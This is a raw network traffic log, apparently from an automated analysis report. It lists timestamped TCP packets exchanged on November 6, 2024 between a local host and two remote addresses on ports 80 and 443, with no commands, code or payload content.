                                                                                                                                                                                                                            Nov 6, 2024 14:39:20.416512012 CET8049719185.215.113.16192.168.2.5
                                                                                                                                                                                                                            Nov 6, 2024 14:39:20.416523933 CET8049719185.215.113.16192.168.2.5
                                                                                                                                                                                                                            Nov 6, 2024 14:39:20.416534901 CET8049719185.215.113.16192.168.2.5
                                                                                                                                                                                                                            Nov 6, 2024 14:39:20.416547060 CET8049719185.215.113.16192.168.2.5
                                                                                                                                                                                                                            Nov 6, 2024 14:39:20.416558027 CET8049719185.215.113.16192.168.2.5
                                                                                                                                                                                                                            Nov 6, 2024 14:39:20.416574001 CET8049719185.215.113.16192.168.2.5
                                                                                                                                                                                                                            Nov 6, 2024 14:39:20.416577101 CET4971980192.168.2.5185.215.113.16
                                                                                                                                                                                                                            Nov 6, 2024 14:39:20.416595936 CET8049719185.215.113.16192.168.2.5
                                                                                                                                                                                                                            Nov 6, 2024 14:39:20.416609049 CET8049719185.215.113.16192.168.2.5
                                                                                                                                                                                                                            Nov 6, 2024 14:39:20.416619062 CET8049719185.215.113.16192.168.2.5
                                                                                                                                                                                                                            Nov 6, 2024 14:39:20.416621923 CET4971980192.168.2.5185.215.113.16
                                                                                                                                                                                                                            Nov 6, 2024 14:39:20.416632891 CET8049719185.215.113.16192.168.2.5
                                                                                                                                                                                                                            Nov 6, 2024 14:39:20.416644096 CET8049719185.215.113.16192.168.2.5
                                                                                                                                                                                                                            Nov 6, 2024 14:39:20.416646957 CET4971980192.168.2.5185.215.113.16
                                                                                                                                                                                                                            Nov 6, 2024 14:39:20.416656971 CET8049719185.215.113.16192.168.2.5
                                                                                                                                                                                                                            Nov 6, 2024 14:39:20.416660070 CET4971980192.168.2.5185.215.113.16
                                                                                                                                                                                                                            Nov 6, 2024 14:39:20.416668892 CET8049719185.215.113.16192.168.2.5
                                                                                                                                                                                                                            Nov 6, 2024 14:39:20.416680098 CET8049719185.215.113.16192.168.2.5
                                                                                                                                                                                                                            Nov 6, 2024 14:39:20.416682959 CET4971980192.168.2.5185.215.113.16
                                                                                                                                                                                                                            Nov 6, 2024 14:39:20.416691065 CET8049719185.215.113.16192.168.2.5
                                                                                                                                                                                                                            Nov 6, 2024 14:39:20.416702986 CET8049719185.215.113.16192.168.2.5
                                                                                                                                                                                                                            Nov 6, 2024 14:39:20.416713953 CET4971980192.168.2.5185.215.113.16
                                                                                                                                                                                                                            Nov 6, 2024 14:39:20.416726112 CET4971980192.168.2.5185.215.113.16
                                                                                                                                                                                                                            Nov 6, 2024 14:39:20.465671062 CET4971980192.168.2.5185.215.113.16
                                                                                                                                                                                                                            Nov 6, 2024 14:39:20.582045078 CET4971980192.168.2.5185.215.113.16
                                                                                                                                                                                                                            Nov 6, 2024 14:39:21.742003918 CET4434972813.107.246.45192.168.2.5
                                                                                                                                                                                                                            Nov 6, 2024 14:39:21.744055986 CET4434972913.107.246.45192.168.2.5
                                                                                                                                                                                                                            Nov 6, 2024 14:39:21.744642973 CET4434973013.107.246.45192.168.2.5
                                                                                                                                                                                                                            Nov 6, 2024 14:39:21.744874001 CET49728443192.168.2.513.107.246.45
                                                                                                                                                                                                                            Nov 6, 2024 14:39:21.744904995 CET4434972813.107.246.45192.168.2.5
                                                                                                                                                                                                                            Nov 6, 2024 14:39:21.745389938 CET49728443192.168.2.513.107.246.45
                                                                                                                                                                                                                            Nov 6, 2024 14:39:21.745395899 CET4434972813.107.246.45192.168.2.5
                                                                                                                                                                                                                            Nov 6, 2024 14:39:21.745748997 CET49729443192.168.2.513.107.246.45
                                                                                                                                                                                                                            Nov 6, 2024 14:39:21.745774031 CET4434972913.107.246.45192.168.2.5
                                                                                                                                                                                                                            Nov 6, 2024 14:39:21.746181965 CET49729443192.168.2.513.107.246.45
                                                                                                                                                                                                                            Nov 6, 2024 14:39:21.746186972 CET4434972913.107.246.45192.168.2.5
                                                                                                                                                                                                                            Nov 6, 2024 14:39:21.746426105 CET49730443192.168.2.513.107.246.45
                                                                                                                                                                                                                            Nov 6, 2024 14:39:21.746433973 CET4434973013.107.246.45192.168.2.5
                                                                                                                                                                                                                            Nov 6, 2024 14:39:21.746803045 CET49730443192.168.2.513.107.246.45
                                                                                                                                                                                                                            Nov 6, 2024 14:39:21.746807098 CET4434973013.107.246.45192.168.2.5
                                                                                                                                                                                                                            Nov 6, 2024 14:39:21.747661114 CET4434972713.107.246.45192.168.2.5
                                                                                                                                                                                                                            Nov 6, 2024 14:39:21.750154972 CET49727443192.168.2.513.107.246.45
                                                                                                                                                                                                                            Nov 6, 2024 14:39:21.750169992 CET4434972713.107.246.45192.168.2.5
                                                                                                                                                                                                                            Nov 6, 2024 14:39:21.750521898 CET49727443192.168.2.513.107.246.45
                                                                                                                                                                                                                            Nov 6, 2024 14:39:21.750528097 CET4434972713.107.246.45192.168.2.5
                                                                                                                                                                                                                            Nov 6, 2024 14:39:21.871354103 CET4434972813.107.246.45192.168.2.5
                                                                                                                                                                                                                            Nov 6, 2024 14:39:21.872421980 CET4434972813.107.246.45192.168.2.5
                                                                                                                                                                                                                            Nov 6, 2024 14:39:21.872497082 CET49728443192.168.2.513.107.246.45
                                                                                                                                                                                                                            Nov 6, 2024 14:39:21.872546911 CET49728443192.168.2.513.107.246.45
                                                                                                                                                                                                                            Nov 6, 2024 14:39:21.872546911 CET49728443192.168.2.513.107.246.45
                                                                                                                                                                                                                            Nov 6, 2024 14:39:21.872565985 CET4434972813.107.246.45192.168.2.5
                                                                                                                                                                                                                            Nov 6, 2024 14:39:21.872576952 CET4434972813.107.246.45192.168.2.5
                                                                                                                                                                                                                            Nov 6, 2024 14:39:21.873869896 CET4434972913.107.246.45192.168.2.5
                                                                                                                                                                                                                            Nov 6, 2024 14:39:21.874048948 CET4434972913.107.246.45192.168.2.5
                                                                                                                                                                                                                            Nov 6, 2024 14:39:21.874097109 CET49729443192.168.2.513.107.246.45
                                                                                                                                                                                                                            Nov 6, 2024 14:39:21.874140024 CET49729443192.168.2.513.107.246.45
                                                                                                                                                                                                                            Nov 6, 2024 14:39:21.874156952 CET4434972913.107.246.45192.168.2.5
                                                                                                                                                                                                                            Nov 6, 2024 14:39:21.874167919 CET49729443192.168.2.513.107.246.45
                                                                                                                                                                                                                            Nov 6, 2024 14:39:21.874172926 CET4434972913.107.246.45192.168.2.5
                                                                                                                                                                                                                            Nov 6, 2024 14:39:21.875216961 CET4434973013.107.246.45192.168.2.5
                                                                                                                                                                                                                            Nov 6, 2024 14:39:21.875422001 CET4434973013.107.246.45192.168.2.5
                                                                                                                                                                                                                            Nov 6, 2024 14:39:21.875473976 CET49730443192.168.2.513.107.246.45
                                                                                                                                                                                                                            Nov 6, 2024 14:39:21.875499010 CET49730443192.168.2.513.107.246.45
                                                                                                                                                                                                                            Nov 6, 2024 14:39:21.875509024 CET4434973013.107.246.45192.168.2.5
                                                                                                                                                                                                                            Nov 6, 2024 14:39:21.875519991 CET49730443192.168.2.513.107.246.45
                                                                                                                                                                                                                            Nov 6, 2024 14:39:21.875525951 CET4434973013.107.246.45192.168.2.5
                                                                                                                                                                                                                            Nov 6, 2024 14:39:21.876053095 CET49731443192.168.2.513.107.246.45
                                                                                                                                                                                                                            Nov 6, 2024 14:39:21.876075983 CET4434973113.107.246.45192.168.2.5
                                                                                                                                                                                                                            Nov 6, 2024 14:39:21.876144886 CET49731443192.168.2.513.107.246.45
                                                                                                                                                                                                                            Nov 6, 2024 14:39:21.876383066 CET49731443192.168.2.513.107.246.45
                                                                                                                                                                                                                            Nov 6, 2024 14:39:21.876393080 CET4434973113.107.246.45192.168.2.5
                                                                                                                                                                                                                            Nov 6, 2024 14:39:21.877463102 CET49732443192.168.2.513.107.246.45
                                                                                                                                                                                                                            Nov 6, 2024 14:39:21.877497911 CET4434973213.107.246.45192.168.2.5
                                                                                                                                                                                                                            Nov 6, 2024 14:39:21.877584934 CET49732443192.168.2.513.107.246.45
                                                                                                                                                                                                                            Nov 6, 2024 14:39:21.877700090 CET49733443192.168.2.513.107.246.45
                                                                                                                                                                                                                            Nov 6, 2024 14:39:21.877701044 CET49732443192.168.2.513.107.246.45
                                                                                                                                                                                                                            Nov 6, 2024 14:39:21.877713919 CET4434973213.107.246.45192.168.2.5
                                                                                                                                                                                                                            Nov 6, 2024 14:39:21.877726078 CET4434973313.107.246.45192.168.2.5
                                                                                                                                                                                                                            Nov 6, 2024 14:39:21.877790928 CET49733443192.168.2.513.107.246.45
                                                                                                                                                                                                                            Nov 6, 2024 14:39:21.877896070 CET49733443192.168.2.513.107.246.45
                                                                                                                                                                                                                            Nov 6, 2024 14:39:21.877907991 CET4434973313.107.246.45192.168.2.5
                                                                                                                                                                                                                            Nov 6, 2024 14:39:21.882616997 CET4434972713.107.246.45192.168.2.5
                                                                                                                                                                                                                            Nov 6, 2024 14:39:21.882678986 CET4434972713.107.246.45192.168.2.5
                                                                                                                                                                                                                            Nov 6, 2024 14:39:21.882736921 CET49727443192.168.2.513.107.246.45
                                                                                                                                                                                                                            Nov 6, 2024 14:39:21.882852077 CET49727443192.168.2.513.107.246.45
                                                                                                                                                                                                                            Nov 6, 2024 14:39:21.882864952 CET4434972713.107.246.45192.168.2.5
                                                                                                                                                                                                                            Nov 6, 2024 14:39:21.882874966 CET49727443192.168.2.513.107.246.45
                                                                                                                                                                                                                            Nov 6, 2024 14:39:21.882879019 CET4434972713.107.246.45192.168.2.5
                                                                                                                                                                                                                            Nov 6, 2024 14:39:21.885147095 CET49734443192.168.2.513.107.246.45
                                                                                                                                                                                                                            Nov 6, 2024 14:39:21.885179996 CET4434973413.107.246.45192.168.2.5
                                                                                                                                                                                                                            Nov 6, 2024 14:39:21.885272980 CET49734443192.168.2.513.107.246.45
                                                                                                                                                                                                                            Nov 6, 2024 14:39:21.885412931 CET49734443192.168.2.513.107.246.45
                                                                                                                                                                                                                            Nov 6, 2024 14:39:21.885426998 CET4434973413.107.246.45192.168.2.5
                                                                                                                                                                                                                            Nov 6, 2024 14:39:22.204488039 CET4434972613.107.246.45192.168.2.5
                                                                                                                                                                                                                            Nov 6, 2024 14:39:22.205239058 CET49726443192.168.2.513.107.246.45
                                                                                                                                                                                                                            Nov 6, 2024 14:39:22.205256939 CET4434972613.107.246.45192.168.2.5
                                                                                                                                                                                                                            Nov 6, 2024 14:39:22.205791950 CET49726443192.168.2.513.107.246.45
                                                                                                                                                                                                                            Nov 6, 2024 14:39:22.205796003 CET4434972613.107.246.45192.168.2.5
                                                                                                                                                                                                                            Nov 6, 2024 14:39:22.822494030 CET4434973213.107.246.45192.168.2.5
                                                                                                                                                                                                                            Nov 6, 2024 14:39:22.823088884 CET4434973413.107.246.45192.168.2.5
                                                                                                                                                                                                                            Nov 6, 2024 14:39:22.823138952 CET4434973313.107.246.45192.168.2.5
                                                                                                                                                                                                                            Nov 6, 2024 14:39:22.823338032 CET49732443192.168.2.513.107.246.45
                                                                                                                                                                                                                            Nov 6, 2024 14:39:22.823358059 CET4434973213.107.246.45192.168.2.5
                                                                                                                                                                                                                            Nov 6, 2024 14:39:22.823553085 CET4434973113.107.246.45192.168.2.5
                                                                                                                                                                                                                            Nov 6, 2024 14:39:22.823678017 CET49734443192.168.2.513.107.246.45
                                                                                                                                                                                                                            Nov 6, 2024 14:39:22.823688984 CET4434973413.107.246.45192.168.2.5
                                                                                                                                                                                                                            Nov 6, 2024 14:39:22.823858023 CET49732443192.168.2.513.107.246.45
                                                                                                                                                                                                                            Nov 6, 2024 14:39:22.823864937 CET4434973213.107.246.45192.168.2.5
                                                                                                                                                                                                                            Nov 6, 2024 14:39:22.824094057 CET49731443192.168.2.513.107.246.45
                                                                                                                                                                                                                            Nov 6, 2024 14:39:22.824116945 CET4434973113.107.246.45192.168.2.5
                                                                                                                                                                                                                            Nov 6, 2024 14:39:22.824151039 CET49734443192.168.2.513.107.246.45
                                                                                                                                                                                                                            Nov 6, 2024 14:39:22.824160099 CET4434973413.107.246.45192.168.2.5
                                                                                                                                                                                                                            Nov 6, 2024 14:39:22.824357033 CET49733443192.168.2.513.107.246.45
                                                                                                                                                                                                                            Nov 6, 2024 14:39:22.824372053 CET4434973313.107.246.45192.168.2.5
                                                                                                                                                                                                                            Nov 6, 2024 14:39:22.824481964 CET49731443192.168.2.513.107.246.45
                                                                                                                                                                                                                            Nov 6, 2024 14:39:22.824487925 CET4434973113.107.246.45192.168.2.5
                                                                                                                                                                                                                            Nov 6, 2024 14:39:22.824744940 CET49733443192.168.2.513.107.246.45
                                                                                                                                                                                                                            Nov 6, 2024 14:39:22.824748993 CET4434973313.107.246.45192.168.2.5
                                                                                                                                                                                                                            Nov 6, 2024 14:39:22.950676918 CET4434973313.107.246.45192.168.2.5
                                                                                                                                                                                                                            Nov 6, 2024 14:39:22.951033115 CET4434973313.107.246.45192.168.2.5
                                                                                                                                                                                                                            Nov 6, 2024 14:39:22.951102018 CET49733443192.168.2.513.107.246.45
                                                                                                                                                                                                                            Nov 6, 2024 14:39:22.951137066 CET49733443192.168.2.513.107.246.45
                                                                                                                                                                                                                            Nov 6, 2024 14:39:22.951150894 CET4434973313.107.246.45192.168.2.5
                                                                                                                                                                                                                            Nov 6, 2024 14:39:22.951162100 CET49733443192.168.2.513.107.246.45
                                                                                                                                                                                                                            Nov 6, 2024 14:39:22.951167107 CET4434973313.107.246.45192.168.2.5
                                                                                                                                                                                                                            Nov 6, 2024 14:39:22.954051018 CET4434973213.107.246.45192.168.2.5
                                                                                                                                                                                                                            Nov 6, 2024 14:39:22.954243898 CET49735443192.168.2.513.107.246.45
                                                                                                                                                                                                                            Nov 6, 2024 14:39:22.954267979 CET4434973513.107.246.45192.168.2.5
                                                                                                                                                                                                                            Nov 6, 2024 14:39:22.954318047 CET4434973213.107.246.45192.168.2.5
                                                                                                                                                                                                                            Nov 6, 2024 14:39:22.954396009 CET49735443192.168.2.513.107.246.45
                                                                                                                                                                                                                            Nov 6, 2024 14:39:22.954410076 CET49732443192.168.2.513.107.246.45
                                                                                                                                                                                                                            Nov 6, 2024 14:39:22.954505920 CET49732443192.168.2.513.107.246.45
                                                                                                                                                                                                                            Nov 6, 2024 14:39:22.954528093 CET4434973213.107.246.45192.168.2.5
                                                                                                                                                                                                                            Nov 6, 2024 14:39:22.954538107 CET49732443192.168.2.513.107.246.45
                                                                                                                                                                                                                            Nov 6, 2024 14:39:22.954544067 CET4434973213.107.246.45192.168.2.5
                                                                                                                                                                                                                            Nov 6, 2024 14:39:22.954601049 CET49735443192.168.2.513.107.246.45
                                                                                                                                                                                                                            Nov 6, 2024 14:39:22.954612970 CET4434973513.107.246.45192.168.2.5
                                                                                                                                                                                                                            Nov 6, 2024 14:39:22.955750942 CET4434973413.107.246.45192.168.2.5
                                                                                                                                                                                                                            Nov 6, 2024 14:39:22.955972910 CET4434973413.107.246.45192.168.2.5
                                                                                                                                                                                                                            Nov 6, 2024 14:39:22.956048965 CET49734443192.168.2.513.107.246.45
                                                                                                                                                                                                                            Nov 6, 2024 14:39:22.956186056 CET49734443192.168.2.513.107.246.45
                                                                                                                                                                                                                            Nov 6, 2024 14:39:22.956186056 CET49734443192.168.2.513.107.246.45
                                                                                                                                                                                                                            Nov 6, 2024 14:39:22.956191063 CET4434973413.107.246.45192.168.2.5
                                                                                                                                                                                                                            Nov 6, 2024 14:39:22.956197977 CET4434973413.107.246.45192.168.2.5
                                                                                                                                                                                                                            Nov 6, 2024 14:39:22.956957102 CET49736443192.168.2.513.107.246.45
                                                                                                                                                                                                                            Nov 6, 2024 14:39:22.957007885 CET4434973613.107.246.45192.168.2.5
                                                                                                                                                                                                                            Nov 6, 2024 14:39:22.957076073 CET49736443192.168.2.513.107.246.45
                                                                                                                                                                                                                            Nov 6, 2024 14:39:22.957190037 CET49736443192.168.2.513.107.246.45
                                                                                                                                                                                                                            Nov 6, 2024 14:39:22.957204103 CET4434973613.107.246.45192.168.2.5
                                                                                                                                                                                                                            Nov 6, 2024 14:39:22.957961082 CET49737443192.168.2.513.107.246.45
                                                                                                                                                                                                                            Nov 6, 2024 14:39:22.957983971 CET4434973713.107.246.45192.168.2.5
                                                                                                                                                                                                                            Nov 6, 2024 14:39:22.958039999 CET49737443192.168.2.513.107.246.45
                                                                                                                                                                                                                            Nov 6, 2024 14:39:22.958137035 CET49737443192.168.2.513.107.246.45
                                                                                                                                                                                                                            Nov 6, 2024 14:39:22.958149910 CET4434973713.107.246.45192.168.2.5
                                                                                                                                                                                                                            Nov 6, 2024 14:39:22.995642900 CET4434973113.107.246.45192.168.2.5
                                                                                                                                                                                                                            Nov 6, 2024 14:39:22.995706081 CET4434973113.107.246.45192.168.2.5
                                                                                                                                                                                                                            Nov 6, 2024 14:39:22.996005058 CET49731443192.168.2.513.107.246.45
                                                                                                                                                                                                                            Nov 6, 2024 14:39:22.996032953 CET49731443192.168.2.513.107.246.45
                                                                                                                                                                                                                            Nov 6, 2024 14:39:22.996045113 CET4434973113.107.246.45192.168.2.5
                                                                                                                                                                                                                            Nov 6, 2024 14:39:22.996054888 CET49731443192.168.2.513.107.246.45
                                                                                                                                                                                                                            Nov 6, 2024 14:39:22.996058941 CET4434973113.107.246.45192.168.2.5
                                                                                                                                                                                                                            Nov 6, 2024 14:39:22.999320984 CET49738443192.168.2.513.107.246.45
                                                                                                                                                                                                                            Nov 6, 2024 14:39:22.999366999 CET4434973813.107.246.45192.168.2.5
                                                                                                                                                                                                                            Nov 6, 2024 14:39:22.999463081 CET49738443192.168.2.513.107.246.45
                                                                                                                                                                                                                            Nov 6, 2024 14:39:22.999639988 CET49738443192.168.2.513.107.246.45
                                                                                                                                                                                                                            Nov 6, 2024 14:39:22.999654055 CET4434973813.107.246.45192.168.2.5
                                                                                                                                                                                                                            Nov 6, 2024 14:39:23.056502104 CET4434972613.107.246.45192.168.2.5
                                                                                                                                                                                                                            Nov 6, 2024 14:39:23.060354948 CET4434972613.107.246.45192.168.2.5
                                                                                                                                                                                                                            Nov 6, 2024 14:39:23.060425043 CET49726443192.168.2.513.107.246.45
                                                                                                                                                                                                                            Nov 6, 2024 14:39:23.060473919 CET49726443192.168.2.513.107.246.45
                                                                                                                                                                                                                            Nov 6, 2024 14:39:23.060482979 CET4434972613.107.246.45192.168.2.5
                                                                                                                                                                                                                            Nov 6, 2024 14:39:23.060497046 CET49726443192.168.2.513.107.246.45
                                                                                                                                                                                                                            Nov 6, 2024 14:39:23.060502052 CET4434972613.107.246.45192.168.2.5
                                                                                                                                                                                                                            Nov 6, 2024 14:39:23.063481092 CET49739443192.168.2.513.107.246.45
                                                                                                                                                                                                                            Nov 6, 2024 14:39:23.063499928 CET4434973913.107.246.45192.168.2.5
                                                                                                                                                                                                                            Nov 6, 2024 14:39:23.063570976 CET49739443192.168.2.513.107.246.45
                                                                                                                                                                                                                            Nov 6, 2024 14:39:23.063725948 CET49739443192.168.2.513.107.246.45
                                                                                                                                                                                                                            Nov 6, 2024 14:39:23.063739061 CET4434973913.107.246.45192.168.2.5
                                                                                                                                                                                                                            Nov 6, 2024 14:39:23.925765038 CET4434973613.107.246.45192.168.2.5
                                                                                                                                                                                                                            Nov 6, 2024 14:39:23.926529884 CET49736443192.168.2.513.107.246.45
                                                                                                                                                                                                                            Nov 6, 2024 14:39:23.926562071 CET4434973613.107.246.45192.168.2.5
                                                                                                                                                                                                                            Nov 6, 2024 14:39:23.927023888 CET49736443192.168.2.513.107.246.45
                                                                                                                                                                                                                            Nov 6, 2024 14:39:23.927030087 CET4434973613.107.246.45192.168.2.5
                                                                                                                                                                                                                            Nov 6, 2024 14:39:23.928700924 CET4434973913.107.246.45192.168.2.5
                                                                                                                                                                                                                            Nov 6, 2024 14:39:23.928961992 CET49739443192.168.2.513.107.246.45
                                                                                                                                                                                                                            Nov 6, 2024 14:39:23.928977013 CET4434973913.107.246.45192.168.2.5
                                                                                                                                                                                                                            Nov 6, 2024 14:39:23.929260015 CET4434973813.107.246.45192.168.2.5
                                                                                                                                                                                                                            Nov 6, 2024 14:39:23.929307938 CET49739443192.168.2.513.107.246.45
                                                                                                                                                                                                                            Nov 6, 2024 14:39:23.929311991 CET4434973913.107.246.45192.168.2.5
                                                                                                                                                                                                                            Nov 6, 2024 14:39:23.929483891 CET49738443192.168.2.513.107.246.45
                                                                                                                                                                                                                            Nov 6, 2024 14:39:23.929491043 CET4434973813.107.246.45192.168.2.5
                                                                                                                                                                                                                            Nov 6, 2024 14:39:23.929830074 CET49738443192.168.2.513.107.246.45
                                                                                                                                                                                                                            Nov 6, 2024 14:39:23.929832935 CET4434973813.107.246.45192.168.2.5
                                                                                                                                                                                                                            Nov 6, 2024 14:39:23.931410074 CET4434973513.107.246.45192.168.2.5
                                                                                                                                                                                                                            Nov 6, 2024 14:39:23.931624889 CET49735443192.168.2.513.107.246.45
                                                                                                                                                                                                                            Nov 6, 2024 14:39:23.931641102 CET4434973513.107.246.45192.168.2.5
                                                                                                                                                                                                                            Nov 6, 2024 14:39:23.931957960 CET49735443192.168.2.513.107.246.45
                                                                                                                                                                                                                            Nov 6, 2024 14:39:23.931962013 CET4434973513.107.246.45192.168.2.5
                                                                                                                                                                                                                            Nov 6, 2024 14:39:23.931988955 CET4434973713.107.246.45192.168.2.5
                                                                                                                                                                                                                            Nov 6, 2024 14:39:23.932188034 CET49737443192.168.2.513.107.246.45
                                                                                                                                                                                                                            Nov 6, 2024 14:39:23.932198048 CET4434973713.107.246.45192.168.2.5
                                                                                                                                                                                                                            Nov 6, 2024 14:39:23.932519913 CET49737443192.168.2.513.107.246.45
                                                                                                                                                                                                                            Nov 6, 2024 14:39:23.932523966 CET4434973713.107.246.45192.168.2.5
                                                                                                                                                                                                                            Nov 6, 2024 14:39:24.058914900 CET4434973813.107.246.45192.168.2.5
                                                                                                                                                                                                                            Nov 6, 2024 14:39:24.059026003 CET4434973813.107.246.45192.168.2.5
                                                                                                                                                                                                                            Nov 6, 2024 14:39:24.059098005 CET49738443192.168.2.513.107.246.45
                                                                                                                                                                                                                            Nov 6, 2024 14:39:24.061665058 CET4434973513.107.246.45192.168.2.5
                                                                                                                                                                                                                            Nov 6, 2024 14:39:24.062401056 CET4434973513.107.246.45192.168.2.5
                                                                                                                                                                                                                            Nov 6, 2024 14:39:24.062469006 CET49735443192.168.2.513.107.246.45
                                                                                                                                                                                                                            Nov 6, 2024 14:39:24.063743114 CET4434973713.107.246.45192.168.2.5
                                                                                                                                                                                                                            Nov 6, 2024 14:39:24.064035892 CET4434973713.107.246.45192.168.2.5
                                                                                                                                                                                                                            Nov 6, 2024 14:39:24.064085007 CET49737443192.168.2.513.107.246.45
                                                                                                                                                                                                                            Nov 6, 2024 14:39:24.064603090 CET4434973613.107.246.45192.168.2.5
                                                                                                                                                                                                                            Nov 6, 2024 14:39:24.065043926 CET4434973613.107.246.45192.168.2.5
                                                                                                                                                                                                                            Nov 6, 2024 14:39:24.065099955 CET49736443192.168.2.513.107.246.45
                                                                                                                                                                                                                            Nov 6, 2024 14:39:24.083115101 CET49738443192.168.2.513.107.246.45
                                                                                                                                                                                                                            Nov 6, 2024 14:39:24.083115101 CET49738443192.168.2.513.107.246.45
                                                                                                                                                                                                                            Nov 6, 2024 14:39:24.083137035 CET4434973813.107.246.45192.168.2.5
                                                                                                                                                                                                                            Nov 6, 2024 14:39:24.083148003 CET4434973813.107.246.45192.168.2.5
                                                                                                                                                                                                                            Nov 6, 2024 14:39:24.084059000 CET49736443192.168.2.513.107.246.45
                                                                                                                                                                                                                            Nov 6, 2024 14:39:24.084064007 CET4434973613.107.246.45192.168.2.5
                                                                                                                                                                                                                            Nov 6, 2024 14:39:24.084078074 CET49736443192.168.2.513.107.246.45
                                                                                                                                                                                                                            Nov 6, 2024 14:39:24.084081888 CET4434973613.107.246.45192.168.2.5
                                                                                                                                                                                                                            Nov 6, 2024 14:39:24.084729910 CET49735443192.168.2.513.107.246.45
                                                                                                                                                                                                                            Nov 6, 2024 14:39:24.084748030 CET4434973513.107.246.45192.168.2.5
                                                                                                                                                                                                                            Nov 6, 2024 14:39:24.084758043 CET49735443192.168.2.513.107.246.45
                                                                                                                                                                                                                            Nov 6, 2024 14:39:24.084764004 CET4434973513.107.246.45192.168.2.5
                                                                                                                                                                                                                            Nov 6, 2024 14:39:24.085326910 CET49737443192.168.2.513.107.246.45
                                                                                                                                                                                                                            Nov 6, 2024 14:39:24.085345030 CET4434973713.107.246.45192.168.2.5
                                                                                                                                                                                                                            Nov 6, 2024 14:39:24.085355043 CET49737443192.168.2.513.107.246.45
                                                                                                                                                                                                                            Nov 6, 2024 14:39:24.085361004 CET4434973713.107.246.45192.168.2.5
                                                                                                                                                                                                                            Nov 6, 2024 14:39:24.138873100 CET4434973913.107.246.45192.168.2.5
                                                                                                                                                                                                                            Nov 6, 2024 14:39:24.138928890 CET4434973913.107.246.45192.168.2.5
                                                                                                                                                                                                                            Nov 6, 2024 14:39:24.138998985 CET49739443192.168.2.513.107.246.45
                                                                                                                                                                                                                            Nov 6, 2024 14:39:24.165534973 CET49740443192.168.2.513.107.246.45
                                                                                                                                                                                                                            Nov 6, 2024 14:39:24.165575981 CET4434974013.107.246.45192.168.2.5
                                                                                                                                                                                                                            Nov 6, 2024 14:39:24.165692091 CET49740443192.168.2.513.107.246.45
                                                                                                                                                                                                                            Nov 6, 2024 14:39:24.184350967 CET49741443192.168.2.513.107.246.45
                                                                                                                                                                                                                            Nov 6, 2024 14:39:24.184389114 CET4434974113.107.246.45192.168.2.5
                                                                                                                                                                                                                            Nov 6, 2024 14:39:24.184514046 CET49741443192.168.2.513.107.246.45
                                                                                                                                                                                                                            Nov 6, 2024 14:39:24.184598923 CET49739443192.168.2.513.107.246.45
                                                                                                                                                                                                                            Nov 6, 2024 14:39:24.184618950 CET4434973913.107.246.45192.168.2.5
                                                                                                                                                                                                                            Nov 6, 2024 14:39:24.184628963 CET49739443192.168.2.513.107.246.45
                                                                                                                                                                                                                            Nov 6, 2024 14:39:24.184633970 CET4434973913.107.246.45192.168.2.5
                                                                                                                                                                                                                            Nov 6, 2024 14:39:24.195864916 CET49741443192.168.2.513.107.246.45
                                                                                                                                                                                                                            Nov 6, 2024 14:39:24.195878983 CET4434974113.107.246.45192.168.2.5
                                                                                                                                                                                                                            Nov 6, 2024 14:39:24.223520041 CET49742443192.168.2.513.107.246.45
                                                                                                                                                                                                                            Nov 6, 2024 14:39:24.223548889 CET4434974213.107.246.45192.168.2.5
                                                                                                                                                                                                                            Nov 6, 2024 14:39:24.223638058 CET49742443192.168.2.513.107.246.45
                                                                                                                                                                                                                            Nov 6, 2024 14:39:24.227369070 CET49740443192.168.2.513.107.246.45
                                                                                                                                                                                                                            Nov 6, 2024 14:39:24.227387905 CET4434974013.107.246.45192.168.2.5
                                                                                                                                                                                                                            Nov 6, 2024 14:39:24.245039940 CET49743443192.168.2.513.107.246.45
                                                                                                                                                                                                                            Nov 6, 2024 14:39:24.245057106 CET4434974313.107.246.45192.168.2.5
                                                                                                                                                                                                                            Nov 6, 2024 14:39:24.245131969 CET49743443192.168.2.513.107.246.45
                                                                                                                                                                                                                            Nov 6, 2024 14:39:24.245733976 CET49742443192.168.2.513.107.246.45
                                                                                                                                                                                                                            Nov 6, 2024 14:39:24.245752096 CET4434974213.107.246.45192.168.2.5
                                                                                                                                                                                                                            Nov 6, 2024 14:39:24.245946884 CET49743443192.168.2.513.107.246.45
                                                                                                                                                                                                                            Nov 6, 2024 14:39:24.245958090 CET4434974313.107.246.45192.168.2.5
                                                                                                                                                                                                                            Nov 6, 2024 14:39:24.246797085 CET49744443192.168.2.513.107.246.45
                                                                                                                                                                                                                            Nov 6, 2024 14:39:24.246823072 CET4434974413.107.246.45192.168.2.5
                                                                                                                                                                                                                            Nov 6, 2024 14:39:24.246942043 CET49744443192.168.2.513.107.246.45
                                                                                                                                                                                                                            Nov 6, 2024 14:39:24.247276068 CET49744443192.168.2.513.107.246.45
                                                                                                                                                                                                                            Nov 6, 2024 14:39:24.247289896 CET4434974413.107.246.45192.168.2.5
                                                                                                                                                                                                                            Nov 6, 2024 14:39:24.933614969 CET4434974113.107.246.45192.168.2.5
                                                                                                                                                                                                                            Nov 6, 2024 14:39:24.934170961 CET49741443192.168.2.513.107.246.45
                                                                                                                                                                                                                            Nov 6, 2024 14:39:24.934197903 CET4434974113.107.246.45192.168.2.5
                                                                                                                                                                                                                            Nov 6, 2024 14:39:24.935131073 CET49741443192.168.2.513.107.246.45
                                                                                                                                                                                                                            Nov 6, 2024 14:39:24.935136080 CET4434974113.107.246.45192.168.2.5
                                                                                                                                                                                                                            Nov 6, 2024 14:39:24.976563931 CET4434974213.107.246.45192.168.2.5
                                                                                                                                                                                                                            Nov 6, 2024 14:39:24.977193117 CET49742443192.168.2.513.107.246.45
                                                                                                                                                                                                                            Nov 6, 2024 14:39:24.977214098 CET4434974213.107.246.45192.168.2.5
                                                                                                                                                                                                                            Nov 6, 2024 14:39:24.977669001 CET49742443192.168.2.513.107.246.45
                                                                                                                                                                                                                            Nov 6, 2024 14:39:24.977673054 CET4434974213.107.246.45192.168.2.5
                                                                                                                                                                                                                            Nov 6, 2024 14:39:24.979037046 CET4434974013.107.246.45192.168.2.5
                                                                                                                                                                                                                            Nov 6, 2024 14:39:24.979417086 CET49740443192.168.2.513.107.246.45
                                                                                                                                                                                                                            Nov 6, 2024 14:39:24.979424953 CET4434974013.107.246.45192.168.2.5
                                                                                                                                                                                                                            Nov 6, 2024 14:39:24.979876995 CET49740443192.168.2.513.107.246.45
                                                                                                                                                                                                                            Nov 6, 2024 14:39:24.979882002 CET4434974013.107.246.45192.168.2.5
                                                                                                                                                                                                                            Nov 6, 2024 14:39:24.986197948 CET4434974413.107.246.45192.168.2.5
